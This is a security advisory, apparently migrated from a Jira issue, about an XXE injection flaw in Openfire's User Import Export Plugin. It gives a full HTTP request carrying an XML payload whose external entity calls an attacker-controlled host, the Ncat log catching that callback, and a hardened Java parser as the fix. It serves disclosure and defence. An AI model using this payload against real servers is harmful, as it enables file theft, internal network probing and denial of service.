...Migrated from Ignite Jira OF-1302...
Credit for Discovery
Jerzy Kramarz, Michail Sarantidis, Rafael Gil Larios, Giovani Cattani, Anton Garcia [portcullis-security]
Description
User Import Export Plugin version 2.6.0 (available from Plugin Admin) for Openfire 4.1.2-1 is vulnerable to an XML External Entity (XXE) injection attack. The following XML payload was used to trigger the XXE:
POST /plugins/userimportexport/import-user-data.jsp?importUsers HTTP/1.1
Host: X.X.X.X
Content-Length: 1099
Cache-Control: max-age=0
Origin: http://X.X.X.X
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryX9mrcUIz112RSAao
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
DNT: 1
Referer: http://X.X.X.X/plugins/userimportexport/import-user-data.jsp
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=hlivs8z10wt119qjaplsisxua; _bitnami_closed_banner_03153=1; csrf=h42FIlrzUNS2Oql
Connection: close
------WebKitFormBoundaryX9mrcUIz112RSAao
Content-Disposition: form-data; name="thefile"; filename="/tmp/lololo.xml"
Content-Type: text/xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % remote SYSTEM "http://x.x.x.x/xxe"> ]>
<server-data xmlns="urn:xmpp:pie:0">
<host jid="X.X.X.X">
<user name="admin" password="bitnami">
<query xmlns="jabber:iq:roster"/>&xxeq3nbu;</user>
<user name="test" password="test">
<query xmlns="jabber:iq:roster">
<item jid="12" subscription="none">
<group/>
</item>
</query>
</user>
</host>
</server-data>
------WebKitFormBoundaryX9mrcUIz112RSAao
Content-Disposition: form-data; name="previousDomain"
------WebKitFormBoundaryX9mrcUIz112RSAao
Content-Disposition: form-data; name="xep227support"
true
------WebKitFormBoundaryX9mrcUIz112RSAao--
On the attacker-controlled server, the following request is observed when the parser resolves the external parameter entity:
Ncat: Connection from x.x.x.x.
Ncat: Connection from x.x.x.x.
GET /xxe HTTP/1.1
User-Agent: Java/1.8.0_121
Host: x.x.x.x
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
The vulnerability can be exploited either via Cross-Site Request Forgery against a logged-in user of the import page, or directly if an account with the credentials required to reach the plugin is compromised.
Impact
This vulnerability may allow the retrieval of arbitrary files from the server, or the causing of a Denial of Service condition (by making the server read from a file such as `/dev/random`). External entities can also reference URLs, potentially allowing port scanning from the XML parser's host, or the retrieval of sensitive web content that would otherwise be inaccessible due to network topology and defences.
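The root cause is a JAXP parser that resolves DOCTYPE declarations and external entities on attacker-supplied XML. Below is an added example (not the plugin's own code, whose parser setup is not shown here) of how a defender would configure the DOM parser for an import endpoint like this one so that the payload above is rejected before any entity is fetched; the class and method names and the sample document are constructed for illustration.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

public class SafeUserImportParser {
    // Constructed sample with the same shape as the payload in the report:
    // a DTD declaring an external parameter entity, then XEP-0227 user data.
    static final String PAYLOAD = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
        + "<!DOCTYPE foo [<!ENTITY % remote SYSTEM \"http://attacker.invalid/xxe\"> ]>"
        + "<server-data xmlns=\"urn:xmpp:pie:0\"><host jid=\"example.invalid\">"
        + "<user name=\"admin\" password=\"x\"><query xmlns=\"jabber:iq:roster\"/></user>"
        + "</host></server-data>";

    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Refuse any DOCTYPE: an import file never needs one, and this single
        // feature blocks external general/parameter entities and entity-expansion DoS.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth for parsers that honour only the SAX-level features.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        f.setNamespaceAware(true);
        return f.newDocumentBuilder();
    }

    // Returns true only if the upload parsed and has the expected root element.
    static boolean accepts(DocumentBuilder builder, String xml) {
        try {
            Document doc = builder.parse(new InputSource(new StringReader(xml)));
            return "server-data".equals(doc.getDocumentElement().getLocalName());
        } catch (SAXException | IOException e) {
            // Hardened parser raises a SAXParseException on the DOCTYPE; no request leaves the host.
            return false;
        }
    }

    public static void main(String[] args) throws ParserConfigurationException {
        System.out.println("import accepted: " + accepts(hardenedBuilder(), PAYLOAD));
    }
}
```

With the default `DocumentBuilderFactory` settings the same input makes the server fetch the entity URL, which is exactly the `GET /xxe` with a `Java/1.8.0_121` User-Agent shown in the report; the hardened builder rejects it at the DOCTYPE instead.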